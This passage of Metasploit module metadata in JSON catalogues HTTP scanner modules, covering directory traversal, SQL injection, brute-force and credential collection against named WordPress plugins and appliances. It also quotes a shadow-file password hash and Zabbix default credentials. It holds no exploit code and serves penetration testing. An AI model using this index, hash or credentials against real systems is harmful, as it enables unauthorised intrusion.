"description": "This module exploits the WANGKONGBAO CNS-1000 and 1100 UTM appliances aka\n Network Security Platform. This directory traversal vulnerability is interesting\n because the apache server is running as root, this means we can grab anything we\n want! For instance, the /etc/shadow and /etc/passwd files for the special\n kfc:$1$SlSyHd1a$PFZomnVnzaaj3Ei2v1ByC0:15488:0:99999:7::: user",
"references": [
"CVE-2012-4031",
"EDB-19526"
],
"platform": "",
"arch": "",
"rport": 85,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/wangkongbao_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/wangkongbao_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/web_vulndb": {
"name": "HTTP Vuln Scanner",
"full_name": "auxiliary/scanner/http/web_vulndb",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies common vulnerable files or cgis.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/web_vulndb.rb",
"is_install_path": true,
"ref_name": "scanner/http/web_vulndb",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/webdav_internal_ip": {
"name": "HTTP WebDAV Internal IP Scanner",
"full_name": "auxiliary/scanner/http/webdav_internal_ip",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect webservers internal IPs though WebDAV",
"references": [
"CVE-2002-0422"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/webdav_internal_ip.rb",
"is_install_path": true,
"ref_name": "scanner/http/webdav_internal_ip",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/webdav_scanner": {
"name": "HTTP WebDAV Scanner",
"full_name": "auxiliary/scanner/http/webdav_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect webservers with WebDAV enabled",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/webdav_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/webdav_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/webdav_website_content": {
"name": "HTTP WebDAV Website Content Scanner",
"full_name": "auxiliary/scanner/http/webdav_website_content",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect webservers disclosing its content though WebDAV",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/webdav_website_content.rb",
"is_install_path": true,
"ref_name": "scanner/http/webdav_website_content",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/webpagetest_traversal": {
"name": "WebPageTest Directory Traversal",
"full_name": "auxiliary/scanner/http/webpagetest_traversal",
"rank": 300,
"disclosure_date": "2012-07-13",
"type": "auxiliary",
"author": [
"dun",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in WebPageTest.\n Due to the way the gettext.php script handles the 'file' parameter, it is possible\n to read a file outside the www directory.",
"references": [
"EDB-19790",
"OSVDB-83817"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/webpagetest_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wildfly_traversal": {
"name": "WildFly Directory Traversal",
"full_name": "auxiliary/scanner/http/wildfly_traversal",
"rank": 300,
"disclosure_date": "2014-10-22",
"type": "auxiliary",
"author": [
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability found in the WildFly 8.1.0.Final\n web server running on port 8080, named JBoss Undertow. The vulnerability only affects to\n Windows systems.",
"references": [
"CVE-2014-7816",
"URL-https://access.redhat.com/security/cve/CVE-2014-7816",
"URL-https://www.conviso.com.br/advisories/CONVISO-14-001.txt",
"URL-http://www.openwall.com/lists/oss-security/2014/11/27/4"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wildfly_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/wildfly_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_content_injection": {
"name": "WordPress REST API Content Injection",
"full_name": "auxiliary/scanner/http/wordpress_content_injection",
"rank": 300,
"disclosure_date": "2017-02-01",
"type": "auxiliary",
"author": [
"Marc Montpas",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a content injection vulnerability in WordPress\n versions 4.7 and 4.7.1 via type juggling in the REST API.",
"references": [
"CVE-2017-5612",
"WPVDB-8734",
"URL-https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html",
"URL-https://secure.php.net/manual/en/language.types.type-juggling.php",
"URL-https://developer.wordpress.org/rest-api/using-the-rest-api/discovery/",
"URL-https://developer.wordpress.org/rest-api/reference/posts/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_content_injection.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_content_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_cp_calendar_sqli": {
"name": "WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/wordpress_cp_calendar_sqli",
"rank": 300,
"disclosure_date": "2015-03-03",
"type": "auxiliary",
"author": [
"Joaquin Ramirez Martinez",
"bperry"
],
"description": "This module will scan given instances for an unauthenticated SQL injection\n within the CP Multi-View Calendar plugin v1.1.4 for Wordpress.",
"references": [
"CVE-2014-8586",
"EDB-36243",
"WPVDB-7910"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_cp_calendar_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_ghost_scanner": {
"name": "WordPress XMLRPC GHOST Vulnerability Scanner",
"full_name": "auxiliary/scanner/http/wordpress_ghost_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robert Rowley",
"Christophe De La Fuente",
"Chaim Sanders",
"Felipe Costa",
"Jonathan Claudius",
"Karl Sigler",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module can be used to determine hosts vulnerable to the GHOST vulnerability via\n a call to the WordPress XMLRPC interface. If the target is vulnerable, the system\n will segfault and return a server error. On patched systems, a normal XMLRPC error\n is returned.",
"references": [
"CVE-2015-0235",
"URL-http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html",
"URL-http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_ghost_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_login_enum": {
"name": "WordPress Brute Force and User Enumeration Utility",
"full_name": "auxiliary/scanner/http/wordpress_login_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>",
"Zach Grace <zgrace@404labs.com>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "WordPress Authentication Brute Force and User Enumeration Utility",
"references": [
"BID-35581",
"CVE-2009-2335",
"OSVDB-55713"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-06-14 13:28:03 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_login_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_login_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_multicall_creds": {
"name": "Wordpress XML-RPC system.multicall Credential Collector",
"full_name": "auxiliary/scanner/http/wordpress_multicall_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"KingSabri <King.Sabri@gmail.com>",
"William <WCoppola@Lares.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to find Wordpress credentials by abusing the XMLRPC\n APIs. Wordpress versions prior to 4.4.1 are suitable for this type of\n technique. For newer versions, the script will drop the CHUNKSIZE to 1 automatically.",
"references": [
"URL-https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/",
"URL-https://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_multicall_creds",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_pingback_access": {
"name": "Wordpress Pingback Locator",
"full_name": "auxiliary/scanner/http/wordpress_pingback_access",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Thomas McCarthy \"smilingraccoon\" <smilingraccoon@gmail.com>",
"Brandon McCann \"zeknox\" <bmccann@accuvant.com>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module will scan for wordpress sites with the Pingback\n API enabled. By interfacing with the API an attacker can cause\n the wordpress site to port scan an external target and return\n results. Refer to the wordpress_pingback_portscanner module.\n This issue was fixed in wordpress 3.5.1",
"references": [
"CVE-2013-0235",
"URL-http://www.securityfocus.com/archive/1/525045/30/30/threaded",
"URL-http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/",
"URL-https://github.com/FireFart/WordpressPingbackPortScanner"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_pingback_access.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_pingback_access",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_scanner": {
"name": "Wordpress Scanner",
"full_name": "auxiliary/scanner/http/wordpress_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "Detects Wordpress installations and their version number",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wordpress_xmlrpc_login": {
"name": "Wordpress XML-RPC Username/Password Login Scanner",
"full_name": "auxiliary/scanner/http/wordpress_xmlrpc_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Cenk Kalpakoglu <cenk.kalpakoglu@gmail.com>"
],
"description": "This module attempts to authenticate against a Wordpress-site\n (via XMLRPC) using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.",
"references": [
"URL-https://wordpress.org/",
"URL-http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/wordpress_xmlrpc_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_arbitrary_file_deletion": {
"name": "Wordpress Arbitrary File Deletion",
"full_name": "auxiliary/scanner/http/wp_arbitrary_file_deletion",
"rank": 300,
"disclosure_date": "2018-06-26",
"type": "auxiliary",
"author": [
"Slavco Mihajloski",
"Karim El Ouerghemmi",
"Aloïs Thévenot"
],
"description": "An arbitrary file deletion vulnerability in the WordPress core allows any user with privileges of an\n Author to completely take over the WordPress site and to execute arbitrary code on the server.",
"references": [
"WPVDB-9100",
"EDB-44949",
"PACKETSTORM-148333",
"URL-https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/",
"URL-https://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-03 12:21:38 +0000",
"path": "/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_arbitrary_file_deletion",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_contus_video_gallery_sqli": {
"name": "WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/wp_contus_video_gallery_sqli",
"rank": 300,
"disclosure_date": "2015-02-24",
"type": "auxiliary",
"author": [
"Claudio Viviani",
"bperry"
],
"description": "This module attempts to exploit a UNION-based SQL injection in Contus Video\n Gallery for Wordpress version 2.7 and likely prior in order if the instance is\n vulnerable.",
"references": [
"CVE-2015-2065",
"WPVDB-7793"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_contus_video_gallery_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_dukapress_file_read": {
"name": "WordPress DukaPress Plugin File Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_dukapress_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Kacper Szurek",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n \"DukaPress\" version 2.5.2, allowing to read arbitrary files with the\n web server privileges.",
"references": [
"EDB-35346",
"CVE-2014-8799",
"WPVDB-7731",
"OSVDB-115130"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_dukapress_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_gimedia_library_file_read": {
"name": "WordPress GI-Media Library Plugin Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/wp_gimedia_library_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Unknown",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n GI-Media Library version 2.2.2, allowing to read arbitrary files from the\n system with the web server privileges. This module has been tested successfully\n on GI-Media Library version 2.2.2 with WordPress 4.1.3 on Ubuntu 12.04 Server.",
"references": [
"WPVDB-7754",
"URL-http://wordpressa.quantika14.com/repository/index.php?id=24"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_gimedia_library_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_mobile_pack_info_disclosure": {
"name": "WordPress Mobile Pack Information Disclosure Vulnerability",
"full_name": "auxiliary/scanner/http/wp_mobile_pack_info_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nitin Venkatesh",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an information disclosure vulnerability in WordPress Plugin\n \"WP Mobile Pack\" version 2.1.2, allowing to read files with privileges\n information.",
"references": [
"CVE-2014-5337",
"WPVDB-8107",
"PACKETSTORM-132750"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_mobile_pack_info_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_mobileedition_file_read": {
"name": "WordPress Mobile Edition File Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_mobileedition_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Khwanchai Kaewyos",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n \"WP Mobile Edition\" version 2.2.7, allowing to read arbitrary files with the\n web server privileges.",
"references": [
"EDB-36733",
"WPVDB-7898"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_mobileedition_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_nextgen_galley_file_read": {
"name": "WordPress NextGEN Gallery Directory Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_nextgen_galley_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Sathish Kumar",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an authenticated directory traversal vulnerability\n in WordPress Plugin \"NextGEN Gallery\" version 2.1.7, allowing\n to read arbitrary directories with the web server privileges.",
"references": [
"WPVDB-8165",
"URL-http://permalink.gmane.org/gmane.comp.security.oss.general/17650"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_nextgen_galley_file_read",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_simple_backup_file_read": {
"name": "WordPress Simple Backup File Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_simple_backup_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Mahdi.Hidden",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n \"Simple Backup\" version 2.7.10, allowing to read arbitrary files with the\n web server privileges.",
"references": [
"WPVDB-7997",
"PACKETSTORM-131919"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_simple_backup_file_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wp_subscribe_comments_file_read": {
"name": "WordPress Subscribe Comments File Read Vulnerability",
"full_name": "auxiliary/scanner/http/wp_subscribe_comments_file_read",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tom Adams <security@dxw.com>",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an authenticated directory traversal vulnerability\n in WordPress Plugin \"Subscribe to Comments\" version 2.1.2, allowing\n to read arbitrary files with the web server privileges.",
"references": [
"WPVDB-8102",
"PACKETSTORM-132694",
"URL-https://security.dxw.com/advisories/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_subscribe_comments_file_read",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/xpath": {
"name": "HTTP Blind XPATH 1.0 Injector",
"full_name": "auxiliary/scanner/http/xpath",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module exploits blind XPATH 1.0 injections over HTTP GET requests.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/xpath.rb",
"is_install_path": true,
"ref_name": "scanner/http/xpath",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/yaws_traversal": {
"name": "Yaws Web Server Directory Traversal",
"full_name": "auxiliary/scanner/http/yaws_traversal",
"rank": 300,
"disclosure_date": "2011-11-25",
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal bug in Yaws v1.9.1 or less.\n The module can only be used to retrieve files. However, code execution might\n be possible. Because when the malicious user sends a PUT request, a file is\n actually created, except no content is written.",
"references": [
"CVE-2011-4350",
"OSVDB-77581",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=757181"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/yaws_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/yaws_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/zabbix_login": {
"name": "Zabbix Server Brute Force Utility",
"full_name": "auxiliary/scanner/http/zabbix_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module attempts to login to Zabbix server instance using username and password\n combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It\n will also test for the Zabbix default login (Admin:zabbix) and guest access.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/zabbix_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/zabbix_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/zenworks_assetmanagement_fileaccess": {
"name": "Novell ZENworks Asset Management 7.5 Remote File Access",
"full_name": "auxiliary/scanner/http/zenworks_assetmanagement_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a hardcoded user and password for the GetFile maintenance\n task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n Console and can be triggered by sending a specially crafted request to the rtrlet component,\n allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of\n remote files. This module has been successfully tested on Novell ZENworks Asset\n Management 7.5.",
"references": [
"CVE-2012-4933",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/zenworks_assetmanagement_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/zenworks_assetmanagement_getconfig": {
"name": "Novell ZENworks Asset Management 7.5 Configuration Access",
"full_name": "auxiliary/scanner/http/zenworks_assetmanagement_getconfig",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a hardcoded user and password for the GetConfig maintenance\n task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web\n Console and can be triggered by sending a specially crafted request to the rtrlet component,\n allowing a remote unauthenticated user to retrieve the configuration parameters of\n Novell Zenworks Asset Managment, including the database credentials in clear text.\n This module has been successfully tested on Novell ZENworks Asset Management 7.5.",
"references": [
"CVE-2012-4933",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb",
"is_install_path": true,
"ref_name": "scanner/http/zenworks_assetmanagement_getconfig",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/ike/cisco_ike_benigncertain": {
"name": "Cisco IKE Information Disclosure",
"full_name": "auxiliary/scanner/ike/cisco_ike_benigncertain",
"rank": 300,
"disclosure_date": "2016-09-29",
"type": "auxiliary",
"author": [
"Nixawk"
],
